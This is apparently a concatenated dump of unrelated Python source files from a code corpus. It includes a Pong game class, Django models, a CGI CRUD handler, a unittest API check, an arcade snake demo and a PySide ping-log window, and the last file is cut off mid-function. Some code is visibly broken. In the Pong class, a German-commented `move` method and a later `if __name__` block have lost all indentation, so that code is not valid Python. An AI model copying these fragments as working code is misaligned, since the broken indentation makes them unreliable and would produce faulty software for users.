    def __sensor_y(self):
        """
        Return the y component of the ball's position vector with noise added.
        :return float, y component of the position vector
        """
        # Noise is uniform in [-outputNoiseMax/2, +outputNoiseMax/2]
        return self.posVec[1] + (random.random() - 0.5) * self.outputNoiseMax
    def __sensor_bat(self, player):
        """
        Return the y-axis paddle position of the given player with noise added.
        :param player: player 0 or 1
        :type player: int (0 or 1)
        :return float, paddle position of the player
        """
        # Noise is uniform in [-outputNoiseMax/2, +outputNoiseMax/2]
        return self.bat[player] + (random.random() - 0.5) * self.outputNoiseMax
    def scaled_sensor_x(self):
        """
        Return the ball's x position scaled to [-1, +1], with noise
        (the noise comes from __sensor_x()).
        :return float, scaled x component of the position vector
        """
        return self.__sensor_x() / (self.x_max / 2.0) - 1.0
    def scaled_sensor_y(self):
        """
        Return the ball's y position scaled to [-1, +1], with noise
        (the noise comes from __sensor_y()).
        :return float, scaled y component of the position vector
        """
        return self.__sensor_y() / (self.y_max / 2.0) - 1.0
    def scaled_sensor_bat(self, player):
        """
        Return the paddle position of the given player scaled to [-1, +1],
        with noise (the noise comes from __sensor_bat()).
        :param player: player 0 or 1
        :type player: int (0 or 1)
        :return float, scaled paddle position of the player
        """
        return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0
    def hitbat(self, player):
        """
        Whether the given player's paddle was hit in the current tick/turn.
        :param player: player 0 or 1
        :type player: int (0 or 1)
        :return bool, True if the paddle was hit, False otherwise
        """
        return self._bathit[player]
    def scaled_sensor_err(self, player):
        """
        Return the given player's error scaled to [-1, +1]: the distance
        between the ball's impact point on the goal line and the (noisy)
        paddle position.
        :pre hitbat(player) or out(player)
        :param player: player 0 or 1
        :type player: int (0 or 1)
        :return float, scaled error of the player
        """
        return (self.poi[player] - self.__sensor_bat(player) ) / self.y_max
    def out(self, player):
        """
        Whether the ball crossed the goal line of the given player.
        :param player: player 0 or 1
        :type player: int (0 or 1)
        :return bool, True if the ball crossed this player's line, else False
        """
        return self._out[player]
    def getpoints(self, player):
        """
        Return the score of the given player.
        :param player: player 0 or 1
        :type player: int (0 or 1)
        :return int, score of the player
        """
        return self.Points[player]
    def tick(self):
        """
        Compute one tick/turn of the game.

        Moves the ball, resets the per-tick paddle-hit and out-of-bounds
        flags, restarts the rally if the players have bounced the ball too
        often without a goal (prevents endless games), bounces the ball off
        the top and bottom walls, and finally checks both goal lines for a
        paddle hit or a goal.
        :return void
        """
        #########################
        ### Initialisation    ###
        #########################
        # Advance the ball one step: the unit direction vector dirVec is
        # scaled by the factor self.speed.
        self.posVec += self.dirVec * self.speed
        # Did a paddle hit the ball this tick?
        # bathit[0] -> left paddle
        # bathit[1] -> right paddle
        self._bathit = [False, False]
        self._out = [False, False]
        ###################
        ### Game logic  ###
        ###################
        # After more than 10 hits (each player hit at least ~5 times) the
        # rally is restarted to break the current endless loop — otherwise
        # the networks would learn nothing new here.
        if self.bouncecount > 10:
            self.__initvectors()
        # Bounce off the bottom wall at y = 0
        if self.posVec[1] < 0:
            self.posVec[1] *= -1.0
            self.dirVec[1] *= -1.0
        # Bounce off the top wall at y = y_max
        if self.posVec[1] > self.y_max:
            self.posVec[1] = 2 * self.y_max - self.posVec[1]
            self.dirVec[1] *= -1.0
        # Check for a hit/goal on the left side (player 0)
        self.__tickBounceLeft()
        # Check for a hit/goal on the right side (player 1)
        self.__tickBounceRight()
    def __tickBounceLeft(self):
        """
        Check whether the ball left the field on player 0's side or was
        caught by player 0's paddle.
        :return: void
        """
        # x < 0 means the ball crossed player 0's goal line
        if self.posVec[0] < 0:
            # Compute the exact theoretical point of impact (poi) on
            # player 0's line (x = 0)
            factor = (0 - self.posVec[0]) / self.dirVec[0]
            poi = self.posVec + (factor * self.dirVec)
            self.poi[0] = poi[1]  # stored for later use, e.g. scaled_sensor_err(player)
            # Would the paddle have caught the ball there? If so ...
            if (poi[1] > self.bat[0] - self.batsize) and (poi[1] < self.bat[0] + self.batsize):
                self._bathit[0] = True  # ... remember the hit, e.g. for hitbat(player)
            else:  # if not, then ...
                self.Points[1] += 1  # ... player 1 (right) scores
                self._out[0] = True  # and remember the ball left the field,
                                     # e.g. for out(player)
            # Bounce the ball back if:
            # -> infinite is True, i.e. the game runs endlessly without resets
            # -> the paddle caught the ball
            if self.infinite or self._bathit[0]:
                self.posVec[0] *= -1.0  # angle of incidence = angle of reflection
                self.dirVec[0] *= -1.0
                self.bouncecount += 1  # count the hit for the endless-rally reset
            else:
                self.__initvectors()  # no hit, so restart the rally
                self.bouncecount = 0
    def __tickBounceRight(self):
        """Check whether the ball left the field on player 1's side or was
        caught by player 1's paddle.
        :return: void
        """
        # x > x_max means the ball crossed player 1's goal line
        if self.posVec[0] > self.x_max:
            # Compute the exact theoretical point of impact (poi) on
            # player 1's line (x = self.x_max)
            factor = (self.x_max - self.posVec[0]) / self.dirVec[0]
            poi = self.posVec + (factor * self.dirVec)
            self.poi[1] = poi[1]  # stored for later use, e.g. scaled_sensor_err(player)
            # Would the paddle have caught the ball there? If so ...
            if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1] + self.batsize:
                self._bathit[1] = True  # ... remember the hit, e.g. for hitbat(player)
            else:  # if not, then ...
                self.Points[0] += 1  # ... player 0 (left) scores
                self._out[1] = True  # and remember the ball left the field,
                                     # e.g. for out(player)
            # Bounce the ball back if:
            # -> infinite is True, i.e. the game runs endlessly without resets
            # -> the paddle caught the ball
            if self.infinite or self._bathit[1]:
                # 2 * field length minus the current x gives the new x position
                self.posVec[0] = 2 * self.x_max - self.posVec[0]  # angle of incidence = angle of reflection
                self.dirVec[0] *= -1.0
                self.bouncecount += 1  # count the hit for the endless-rally reset
            else:
                self.__initvectors()  # no hit, so restart the rally
                self.bouncecount = 0
def move(self, player, action):
"""
Bewegt den Schläger eines Spielers
Diese Funktion ist etwas Trickreich, da als "action"-Parameter sowohl ein String als direkter
up/down-Befehl akzeptiert wird, als auch ein Float der den Schläger direkt setzt.
:param player: Spieler 0 oder 1 (dessen Schläger bewegt werden soll)
:type player: Int
:param action: Wenn str, dann zwischen "d" oder "u" unterscheiden (Schläger hoch oder runter bewegen)
:type action: String
:param action: Wenn float, dann Schläger auf die entsprechende Position setzen
:type action: float
:return: void
"""
# Wenn ein String, dann im Befehls-Modus:
if type(action) == str:
# Den Schläger nach oben bewegen
if action == 'u':
self.bat[player] += self.batstep
if self.bat[player] > self.y_max: # Korrektur, falls der obere Spielfeldrand erreicht wurde
self.bat[player] = self.y_max
# Den Schläger nach unten bewegen
if action == 'd':
self.bat[player] -= self.batstep
if self.bat[player] < 0.0: # Korrektur, falls der untere Spielfeldrand erreicht wurde
self.bat[player] = 0.0
# Sonst im Setzen-Modus:
elif type(action) == float:
self.bat[player] = (action + 1) * self.y_max / 2 # Der Schläger wird direkt auf die gewünschte Position gesetzt
if self.bat[player] < 0.0: # Korrektur, falls der untere Spielfeldrand erreicht wurde
self.bat[player] = 0.0
if self.bat[player] > self.y_max: # Korrektur, falls der obere Spielfeldrand erreicht wurde
self.bat[player] = self.y_max
    def v_getSize(self):
        """
        visu getter
        :return list [float x, float y] of the playing-field size
        """
        return [self.x_max, self.y_max]
    def v_getSpeed(self):
        """
        visu getter
        :return float, ball speed
        """
        return self.speed
    def v_getBatSize(self):
        """
        visu getter
        :return float, paddle length (half length, centre to end)
        """
        return self.batsize
    def v_getDirVec(self):
        """
        visu getter
        :return movement/direction vector of the ball
        """
        return self.dirVec
    def v_getPosVec(self):
        """
        visu getter
        :return position vector of the ball as [float x, float y]
        """
        return self.posVec
    def v_getbat(self):
        """
        visu getter
        :return: list [bat player 0, bat player 1] -> y position of each
                 paddle's centre point
        """
        return self.bat
    def v_getPoint(self):
        """
        visu getter
        :return: list [points player 0, points player 1] of the score
        """
        return self.Points
5,648 | 6e78d1fb2364d334f47fea89b065d859c025ca2f | #!/usr/bin/env python
#!-*-coding:utf-8 -*-
"""
@version: python3.7
@author: ‘v-enshi‘
@license: Apache Licence
@contact: 123@qq.com
@site:
@software: PyCharm
@file: Images_fade.py
@time: 2019/1/16 17:17
"""
from PIL import Image
import numpy as np
filename = "hw0_data/westbrook.jpg"
im = Image.open(filename)  # open the image
imgs = np.array(im)        # convert to an H x W x C uint8 array
# Halve every pixel value to fade/darken the image. Integer floor division
# on the non-negative uint8 data is equivalent to the original
# np.trunc(imgs / 2) followed by an int cast, and avoids the deprecated
# np.int alias (removed in NumPy 1.24). Only the first three (RGB)
# channels are kept, dropping a possible alpha channel.
finalImg = Image.fromarray((imgs[:, :, :3] // 2).astype(np.uint8))
finalImg.save("Q2.jpg")
# Note: Image.fromarray raises if given a uint16 array, hence the explicit
# uint8 conversion above.
|
5,649 | a0dcfb738451c11ed4ff1428629c3f7bbf5c52c9 | from django.db import models
# (stored value, human-readable label) choices for Factory.name.
ch=[
    ('Garment','Garment'),
    ('Hardgoods','Hardgoods'),
    ('Home Furnishing','Home Furnishing'),
    ]
class Factory(models.Model):
    """Top level of the hierarchy; `name` is limited to the `ch` choices."""
    name = models.CharField(max_length=30,choices=ch)

    def __str__(self):
        return self.name
class Fabric(models.Model):
    """Fabric belonging to a Factory; deleted with its parent (CASCADE)."""
    name = models.ForeignKey(Factory, on_delete=models.CASCADE,null=True,blank=True)
    fabric = models.CharField(unique=True,max_length=100,null=True,blank=True)

    def __str__(self):
        # NOTE(review): `fabric` is nullable, so this may return None —
        # confirm whether rows without a fabric value can exist.
        return self.fabric
class Wash(models.Model):
    """Wash type belonging to a Fabric."""
    name=models.ForeignKey(Fabric,on_delete=models.CASCADE,null=True,blank=True)
    wash = models.CharField(unique=True,max_length=100,null=True,blank=True)

    def __str__(self):
        return self.wash
class Category(models.Model):
    """Category linked both to a Factory (`cat`) and to a Wash (`name`)."""
    cat=models.ForeignKey(Factory,on_delete=models.CASCADE,blank=True)
    name = models.ForeignKey(Wash, on_delete=models.CASCADE,null=True,blank=True)
    category = models.CharField(unique=True,max_length=100,null=True,blank=True)

    def __str__(self):
        return self.category
class Subcategory(models.Model):
    """Subcategory belonging to a Category."""
    name = models.ForeignKey(Category, on_delete=models.CASCADE,null=True,blank=True)
    subcategory = models.CharField(unique=True,max_length=100,null=True,blank=True)

    def __str__(self):
        return self.subcategory
class Department(models.Model):
    """Department belonging to a Subcategory."""
    name = models.ForeignKey(Subcategory, on_delete=models.CASCADE,null=True,blank=True)
    department = models.CharField(unique=True,max_length=100,null=True,blank=True)

    def __str__(self):
        return self.department
class Sections(models.Model):
    """Section belonging to a Department."""
    name = models.ForeignKey(Department, on_delete=models.CASCADE,null=True,blank=True)
    section = models.CharField(unique=True,max_length=100,null=True,blank=True)

    def __str__(self):
        return self.section
class Subsection(models.Model):
    """Deepest hierarchy level; belongs to a Sections row."""
    name = models.ForeignKey(Sections, on_delete=models.CASCADE,null=True,blank=True)
    subsection = models.CharField(unique=True,max_length=500,null=True,blank=True)

    def __str__(self):
        return self.subsection
class Person(models.Model):
    """A person linked to one node at every level of the factory hierarchy."""
    name=models.CharField(max_length=30)
    fact=models.ForeignKey(Factory,on_delete=models.CASCADE)
    fab=models.ForeignKey(Fabric,on_delete=models.CASCADE,null=True)
    was= models.ForeignKey(Wash, on_delete=models.CASCADE,null=True)
    cate = models.ForeignKey(Category, on_delete=models.CASCADE)
    subcat=models.ForeignKey(Subcategory,on_delete=models.CASCADE)
    dept = models.ForeignKey(Department, on_delete=models.CASCADE,null=True)
    sect=models.ForeignKey(Sections,on_delete=models.CASCADE,null=True)
    subsect=models.ForeignKey(Subsection,on_delete=models.CASCADE,null=True)

    def __str__(self):
        return str(self.name)
|
5,650 | 5282e9a9e87fd7fd6053f816048f371fbe190046 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from tp_global import *
from cgibase import cgibase
from tp_mongodb import *
import json
import requests
class Ccase_model(cgibase):
    """CGI handler for test-case template (case model) CRUD operations.

    The client sends an operation name in ``opr``; :meth:`onInit` dispatches
    it to the matching handler method.  Results are written to ``self.out``.
    """

    # Number of rows per page in every paged query below.
    PAGE_SIZE = 8

    def __init__(self):
        return cgibase.__init__(self)

    def onInit(self):
        """Entry point: dispatch the requested operation to a handler.

        ``opr`` comes from the request; it must name an existing method on
        this class, otherwise an input error is returned.
        """
        cgibase.SetNoCheckCookie(self)
        opr = cgibase.onInit(self)
        if opr is None:
            return
        if not hasattr(self, opr):
            self.out = g_err["input_err"]
            return
        # getattr dispatch instead of eval("self.%s()" % opr): identical
        # behavior for valid method names, but no string-evaluation /
        # code-injection surface.
        getattr(self, opr)()

    def _requery(self, pid):
        """Re-read page 1 and the total row count for project *pid*.

        Returns ``(total, rows)``; used to refresh the client view after a
        mutating operation (add / update / delete).
        """
        total = Case_model().cmquery_total(pid=pid)
        rows = Case_model().cmquery_page(pid=pid, skip_num=0,
                                         limit_num=self.PAGE_SIZE)
        return total, rows

    # Create a template. Required params: opr, name, pid, ip, url, method, type
    def cmadd(self):
        """Create a new template and return the refreshed first page."""
        self.log.debug("cmadd in.")
        req = self.input["input"]
        name = req["name"]      # template name
        pid = req["pid"]        # id of the owning project
        ip = req["ip"]          # API host
        url = req["url"]        # request url
        method = req["method"]  # request method
        type = req["type"]      # request type (name kept for the model kwarg)
        # cmadd returns the new template id on success, empty on failure.
        num = Case_model().cmadd(name=name, pid=pid, ip=ip, url=url,
                                 method=method, type=type)
        if num:
            total, list0 = self._requery(pid)
            self.out = {"status": 0, "total": total, "data": list0}
        else:
            self.out = {"status": 1}

    # List templates of a project, paged. Required params: opr, pid, page
    def cmquery(self):
        """Return one page of a project's templates.

        ``page`` is 0/empty on the first call, in which case the total row
        count is also returned for client-side pagination.
        """
        self.log.debug("cmquery in.")
        req = self.input["input"]
        pid = req["pid"]
        page = req["page"]
        limitnum = self.PAGE_SIZE
        if page:
            # Rows to skip in the database query.
            skipnum = (int(page) - 1) * limitnum
            list0 = Case_model().cmquery_page(pid=pid, skip_num=skipnum,
                                              limit_num=limitnum)
            self.out = {"data": list0}
        else:
            # First call: also return the total count.
            total = Case_model().cmquery_total(pid=pid)
            list0 = Case_model().cmquery_page(pid=pid, skip_num=0,
                                              limit_num=limitnum)
            self.out = {"total": total, "data": list0}

    # Return (id, name) pairs of a project's templates, used when creating
    # test cases. Required params: opr, pid
    def cmquery_id_name(self):
        """Return id/name pairs for every template of the project."""
        self.log.debug("cmquery_id_name in.")
        req = self.input["input"]
        pid = req["pid"]
        list0 = Case_model().cmquery_id_name(pid=pid)
        self.out = {"data": list0}

    # Fuzzy-search templates by name, paged. Required params: opr, pid, name, page
    def cmquery_by_name(self):
        """Return one page of templates whose name matches the search term."""
        self.log.debug("cmquery_by_name in.")
        req = self.input["input"]
        pid = req["pid"]
        name = req["name"]
        page = req["page"]
        limitnum = self.PAGE_SIZE
        if page:
            skipnum = (int(page) - 1) * limitnum
            list0 = Case_model().cmquery_page_by_name(pid=pid, skip_num=skipnum,
                                                      limit_num=limitnum, name=name)
            self.out = {"data": list0}
        else:
            # First call: also return the total count for pagination.
            total = Case_model().cmquery_total_by_name(pid=pid, name=name)
            list0 = Case_model().cmquery_page_by_name(pid=pid, skip_num=0,
                                                      limit_num=limitnum, name=name)
            self.out = {"total": total, "data": list0}

    # Fetch a single template by id. Required params: opr, id
    def cmquery_by_id(self):
        """Return one template, or status 1 if it does not exist."""
        self.log.debug("cmquery_by_id in.")
        req = self.input["input"]
        id = req["id"]
        case_model = Case_model().cmqueryone(id=id)
        if case_model:
            self.out = {"status": 0, "data": case_model}
        else:
            self.out = {"status": 1}

    # Edit a template. Required params: opr, id, name, pid, ip, url, method, type
    def cmupdate(self):
        """Update a template and return the refreshed first page."""
        self.log.debug("cmupdate in.")
        req = self.input["input"]
        id = req["id"]
        name = req["name"]
        pid = req["pid"]
        ip = req["ip"]
        url = req["url"]
        method = req["method"]
        type = req["type"]
        # cmupdate returns True on success, False on failure.
        istrue = Case_model().cmupdate(id=id, name=name, pid=pid,
                                       ip=ip, url=url, method=method, type=type)
        if istrue:
            total, list0 = self._requery(pid)
            self.out = {"status": 0, "total": total, "data": list0}
        else:
            self.out = {"status": 1}

    # Delete one template or a batch. Required params: opr, id, pid
    def cmdelete(self):
        """Delete template(s); ``id`` may be a single id or a list of ids.

        For a batch, status 0 is reported only when every delete succeeded.
        """
        self.log.debug("cmdelete in.")
        req = self.input["input"]
        id = req["id"]
        pid = req["pid"]
        if isinstance(id, list):
            # Batch delete: count successful deletions.
            deleted = 0
            for i in id:
                if Case_model().cmdelete(i):
                    deleted += 1
            if deleted == len(id):
                total, list0 = self._requery(pid)
                self.out = {"status": 0, "total": total, "data": list0}
            else:
                self.out = {"status": 1}
        else:
            # Single delete: cmdelete returns 1 on success, 0 on failure.
            if Case_model().cmdelete(id):
                total, list0 = self._requery(pid)
                self.out = {"status": 0, "total": total, "data": list0}
            else:
                self.out = {"status": 1}
if __name__ == "__main__":
pass |
5,651 | 7b726dd8ebbd5c49f9ce5bddb4779fcfbaaeb479 | from .gsclient import GSClient
from .gspath import GSPath
__all__ = [
"GSClient",
"GSPath",
]
|
5,652 | 3313f01ed98433f4b150c4d8e877ac09eb8403b4 |
from django.conf.urls import url
from tree import views
urlpatterns = [
    # Django's url() takes a regex matched against the request path WITHOUT
    # its leading slash, so a pattern starting with '/' can never match.
    # Anchor the patterns at the start instead.
    url(r'^home', views.home),
    url(r'^about', views.about),
]
5,653 | 0a50b31155afce2558ec066267a9fd0c56964759 | from Store import Store
from MusicProduct import MusicProduct
class MusicStore(Store):
    """A Store specialised to stock music products."""

    def make_product(self, name):
        """Override from parent - return a new MusicProduct object."""
        # The original body was only the docstring, so the method silently
        # returned None instead of the promised product.
        # NOTE(review): assumes MusicProduct takes the product name as its
        # constructor argument — confirm against MusicProduct.__init__.
        return MusicProduct(name)
5,654 | b328ee0b6c5afaf496297cefe477f933af458a03 | import unittest
from utils import getParams
from utils.httpUtil import HttpUtil
from utils.logger import Log
logger = Log(logger='cms_getMarket').get_log()
class NavTest(unittest.TestCase):
    """API smoke test for the CMS ``getMarket`` endpoint."""

    @classmethod
    def setUpClass(cls) -> None:
        # Resolve the endpoint URL from the test config and fetch an auth
        # token once for the whole class.
        cls.url = getParams.get_url('cms_getMarket', 'getMarket')
        HttpUtil.get_token()

    @classmethod
    def tearDownClass(cls) -> None:
        pass

    def test01_getMarket(self):
        # Expected response code/message come from the same config section.
        resp_c = getParams.get_resp_params('cms_getMarket', 'getMarket', 'code')
        resp_m = getParams.get_resp_params('cms_getMarket', 'getMarket', 'msg')
        response = HttpUtil().do_get(self.url)
        self.assertEqual(resp_c, response['code'])
        self.assertEqual(resp_m, response['msg'])
|
5,655 | 8af9cc32b445402fa790b29382a802bd8afc1100 | # Generated by Django 2.2.4 on 2019-09-09 11:00
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0002_ordered'),
]
operations = [
migrations.AlterField(
model_name='generalinfo',
name='amount_available',
field=models.IntegerField(blank=True, default=False, null=True, verbose_name='У наявності'),
),
migrations.AlterField(
model_name='generalinfo',
name='image',
field=models.URLField(blank=True),
),
]
|
5,656 | fbe091b1cf3ecc2f69d34e3b1c399314b38ebc4a | import arcade
# Window dimensions in pixels.
WINDOW_WIDTH = 740
WINDOW_HEIGHT = 740
# RGB colour tuples: two greens for the checkerboard background and a blue
# for the snake body.
dark_green = (170, 216, 81)
light_green = (162, 210, 73)
snake_color = (72, 118, 235)
def square(square_x, square_y, square_width, square_height, square_color):
    """ Code that sets up the squares for generation """
    # Thin wrapper over arcade's filled-rectangle primitive; (x, y) is the
    # rectangle centre.
    arcade.draw_rectangle_filled(square_x, square_y, square_width, square_height, square_color)
def generate_grid():
    """Draw the checkerboard background.

    40 rows of 20 dark-green squares; every second row is shifted half a
    tile so the dark squares alternate against the light window background.
    """
    y_offset = -10
    for _row_pair in range(20):
        # Even row: squares start at x = 10.
        # (The original wrapped each of these steps in a pointless
        # ``for _ in range(1)`` loop; the flattened form is equivalent.)
        x_offset = 10
        y_offset += 20
        for _ in range(20):
            square(x_offset, y_offset, 20, 20, dark_green)
            x_offset += 40
        # Odd row: shifted half a tile, squares start at x = 30.
        x_offset = 30
        y_offset += 20
        for _ in range(20):
            square(x_offset, y_offset, 20, 20, dark_green)
            x_offset += 40
def apple():
    """ Draws an apple """
    # Fixed position (230, 490), radius 9.5, red RGB colour.
    arcade.draw_circle_filled(230, 490, 9.5, (231, 71, 29))
def snake(snake_x, snake_y, snake_scale_x, snake_scale_y, snake_color):
    """ Code that sets up the snake part to be drawn """
    # NOTE(review): the snake_color parameter shadows the module-level
    # constant of the same name; callers currently pass that constant in.
    arcade.draw_rectangle_filled(snake_x, snake_y, snake_scale_x, snake_scale_y, snake_color)
# Movement table for the six snake segments: (x attribute name,
# y attribute name, minimum x before the segment steps back right).
# State lives as attributes on the on_draw function so it survives
# between scheduled frames.
_SNAKE_PARTS = (
    ("snake_part_x", "snake_part_y", 180),
    ("snake_part2_x", "snake_part2_y", 200),
    ("snake_part3_x", "snake_part3_y", 220),
    ("snake_part4_x", "snake_part4_y", 240),
    ("snake_part5_x", "snake_part5_y", 260),
    ("snake_part6_x", "snake_part6_y", 280),
)


def _advance_part(x, y, min_x):
    """Advance one snake segment one step along the scripted demo path.

    Mirrors the six hand-written per-segment if-chains of the original
    code exactly: move left along the bottom, climb when x reaches 550,
    turn at the top (y >= 500), and stop drifting left at *min_x*.
    Returns the new (x, y).
    """
    if x >= 550:
        x -= 20
    elif x <= 550:
        y += 20
    if y >= 500:
        y -= 20
        x -= 20
    if x <= min_x:
        x += 20
    return x, y


def on_draw(delta_time):
    """ Draw everything every frame (the interval is chosen in
    arcade.schedule, e.g. every 1/3 of a second). """
    # Draw all static objects, then every snake segment at its current
    # position.
    arcade.start_render()
    generate_grid()
    apple()
    for x_attr, y_attr, _ in _SNAKE_PARTS:
        snake(getattr(on_draw, x_attr), getattr(on_draw, y_attr), 20, 20, snake_color)
    # Extra head piece once the lead segment has come far enough left.
    if on_draw.snake_part_x <= 230:
        snake(on_draw.snake_part6_x + 20, on_draw.snake_part6_y, 20, 20, snake_color)
    # Advance every segment one step along the scripted path (this
    # replaces the six copy-pasted if-chains of the original).
    for x_attr, y_attr, min_x in _SNAKE_PARTS:
        new_x, new_y = _advance_part(getattr(on_draw, x_attr), getattr(on_draw, y_attr), min_x)
        setattr(on_draw, x_attr, new_x)
        setattr(on_draw, y_attr, new_y)
# Initial positions of the six snake segments, stored as attributes on the
# on_draw function so they persist between scheduled frames.
on_draw.snake_part_x = 570
on_draw.snake_part_y = 130
on_draw.snake_part2_x = 590
on_draw.snake_part2_y = 130
on_draw.snake_part3_x = 610
on_draw.snake_part3_y = 130
on_draw.snake_part4_x = 630
on_draw.snake_part4_y = 130
on_draw.snake_part5_x = 650
on_draw.snake_part5_y = 130
on_draw.snake_part6_x = 670
on_draw.snake_part6_y = 130
def main():
    """ Main code that calls all the rest of the code """
    arcade.open_window(WINDOW_WIDTH, WINDOW_HEIGHT, "Snake.exe")
    # Set the window background colour
    arcade.set_background_color(light_green)
    # Calls on_draw every 1/3 of a second
    arcade.schedule(on_draw, 1/3)
    # Keeps the window open until closed by the user
    arcade.run()


main()
|
5,657 | 75b1d2fb927063669a962f72deb57323001c0b7a | '''
Created on 17 june, 2018
@author: sp977u@att.com (Satish Palnati)
This class is for
'''
import sys
from PySide.QtGui import *
from PySide.QtCore import *
from PySide import QtGui
from PySide import QtCore
class PingWindow:
    """Qt widget showing live ping results: UP nodes on the left, DOWN
    nodes on the right, with a progress bar and a cancel button below.

    The widget is added to ``last_parent.right_base_layout_v`` and starts
    hidden; call :meth:`prepare_window` to reset and show it.
    """

    # Set to True by closeEvent so the owner can detect the window closing.
    wind_close_flg = False

    def __init__(self, last_parent):
        """Build the whole widget tree; *last_parent* supplies the layout
        this window is mounted into."""
        self.last_parent = last_parent
        self.main_widget = QWidget()
        self.main_widget.setMaximumHeight(400)
        self.parent_layout = QVBoxLayout()
        #self.last_parent.right_base_layout_v
        self.ping_log_layout = QHBoxLayout()
        self.progress_bar_layout = QHBoxLayout()  # to incorporate the progress bar and the buttons
        self.secondary_progress_layout = QVBoxLayout()  # just the progress bar
        self.control_button_layout = QGridLayout()  # cancel, close, open valid / invalid file
        # UP ip layout for ping logs
        self.up_ip_layout = QVBoxLayout()
        self.up_ip_btn = QtGui.QLabel("UP Nodes")
        self.up_ip_btn.setFont(QtGui.QFont("Verdana", 10, QtGui.QFont.Bold))
        self.up_ip_btn.setStyleSheet("background-color:white ;color:Green;border: 2px solid black")
        self.up_ip_layout.addWidget(self.up_ip_btn)
        self.up_ip_btn.setToolTip("Please click here to open UP NODE file.. !")
        # NOTE(review): this second setStyleSheet call replaces the
        # white/green style set three lines above.
        self.up_ip_btn.setStyleSheet("""QToolTip { background-color: #00bfff; color: black; border: black solid 1px }""")
        self.up_ip_textbox = QPlainTextEdit()
        self.up_ip_textbox.setFont(QtGui.QFont("Verdana", 10, QtGui.QFont.Bold))
        self.up_ip_textbox.setStyleSheet("background-color: rgb(150,240,190) ;color:rgb(9,57,31);border: 2px solid black; ")
        self.up_ip_textbox.setReadOnly(True)
        self.up_ip_layout.addWidget(self.up_ip_textbox)
        # DOWN ip layout for ping logs
        self.down_ip_layout = QVBoxLayout()
        self.down_ip_btn = QtGui.QLabel("DOWN Nodes")
        self.down_ip_btn.setFont(QtGui.QFont("Verdana", 10, QtGui.QFont.Bold))
        self.down_ip_btn.setStyleSheet("QPushButton {background-color: white ;color:Red;border: 2px solid black}")
        self.down_ip_layout.addWidget(self.down_ip_btn)
        self.down_ip_btn.setToolTip("Please click here to open UP NODE file.. !")
        # NOTE(review): same pattern — the tooltip stylesheet overwrites
        # the style applied above.
        self.down_ip_btn.setStyleSheet("""QToolTip { background-color: #00bfff; color: black; border: black solid 1px }""")
        self.down_ip_textbox = QPlainTextEdit()
        self.down_ip_textbox.setFont(QtGui.QFont("Verdana", 10, QtGui.QFont.Bold))
        self.down_ip_textbox.setStyleSheet("background-color: rgb(250,210,210);color:rgb(118,14,16);border: 2px solid black; ")
        self.down_ip_textbox.setReadOnly(True)
        self.down_ip_layout.addWidget(self.down_ip_textbox)
        # Assemble the nested layouts into the parent layout.
        self.progress_bar_layout.addLayout(self.secondary_progress_layout)
        self.progress_bar_layout.addLayout(self.control_button_layout)
        self.ping_log_layout.addLayout(self.up_ip_layout)
        self.ping_log_layout.addLayout(self.down_ip_layout)
        self.parent_layout.addLayout(self.ping_log_layout)
        self.parent_layout.addLayout(self.progress_bar_layout)
        # Progress bar, status label and cancel button.
        self.progressBar = QtGui.QProgressBar()
        self.progressLabel = QtGui.QLabel("Ping process is in progress .... Please wait until the log file is generated...!")
        self.cancel_button = QtGui.QPushButton("Cancel")
        # self.progressBar.setGeometry(QtCore.QRect(100, 645, 710, 17))
        self.progressBar.setProperty("Current status", 0)
        self.progressBar.setObjectName("progressBar")
        self.progressBar.setMaximumHeight(15)
        self.progressBar.setTextVisible(True)
        self.progressBar.setValue(0)
        self.progressBar.setRange(0,100)
        self.progressLabel.setFont(QtGui.QFont("verdana", 9, QtGui.QFont.Normal))
        self.secondary_progress_layout.addWidget(self.progressBar)
        self.secondary_progress_layout.addWidget(self.progressLabel)
        self.progress_bar_layout.addWidget(self.cancel_button)
        # self.last_parent.msgBox.information(,'Job status!',"Ping logs process has been closed.!", QtGui.QMessageBox.Ok)
        # Mount the widget into the parent layout; it stays hidden until
        # prepare_window() is called.
        self.main_widget.setLayout(self.parent_layout)
        self.last_parent.right_base_layout_v.addWidget(self.main_widget)
        self.main_widget.hide()

    def prepare_window(self,):
        """Reset both log boxes and the progress widgets, then show the
        window for a new ping run."""
        self.progressBar.show()
        self.progressLabel.show()
        self.cancel_button.show()
        self.up_ip_textbox.clear()
        self.down_ip_textbox.clear()
        self.main_widget.show()

    def closeEvent(self,event):
        """Qt close handler: record that the window was closed."""
        self.wind_close_flg = True
5,658 | 92e414c76f4c585092a356d7d2957e91c1477c5f | __version__ = "2.1.2"
default_app_config = "channels.apps.ChannelsConfig"
DEFAULT_CHANNEL_LAYER = "default"
|
5,659 | 8894b73829978cec29aab6ee8bf09700da7fb59f | #-*- coding: utf-8 -*-
import django
# Configure Django according to the installed version.
# NOTE(review): get_version() returns a string, so these are lexicographic
# comparisons (e.g. '1.10.0' < '1.3.1'); confirm against the Django
# versions actually deployed.
if django.get_version() <= '1.3.1':
    import apps.settings as settings
    from django.core.management import setup_environ
    setup_environ(settings)
elif django.get_version() >= '1.7.0':
    import os
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "apps.settings")
    django.setup()
elif django.get_version() >= '1.6.0': #ubuntu 14.04 used 1.6.?
    import os
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "apps.settings")

from django.conf import settings
import os.path
import traceback
cur_dir = os.path.dirname(os.path.abspath(__file__))
# Import progress and failures are appended to this log file.
LOGFILE = os.path.join(cur_dir,"logs","oneclick.log")
# Module basenames that must not be auto-imported (settings/manage variants).
file_list = ['import_test', 'import_test_dev', 'import_test_local','settings', 'manage', 'settings_dev', 'manage_dev', 'settings_stg','manage_stg', 'settings_local','manage_local']
# Directory names skipped during the walk.
exclude_dir = ['.svn', 'realtime_pvp']
def run_dir(py_dir):
    """Walk *py_dir* and import every .py module found (import smoke test).

    Modules named in `file_list` and directories in `exclude_dir` are
    skipped; progress and any import traceback are appended to LOGFILE.
    (Python 2 code: uses print statements and the py2 __import__ level -1.)
    """
    log_f = open(LOGFILE, 'a+')
    try:
        for root, dirs, files in os.walk(py_dir):
            if os.path.basename(root) not in exclude_dir:
                for f in files:
                    name, ext = os.path.splitext(f)
                    if ext == '.py' and name not in file_list:
                        # Turn the filesystem path into a dotted package
                        # path relative to py_dir.
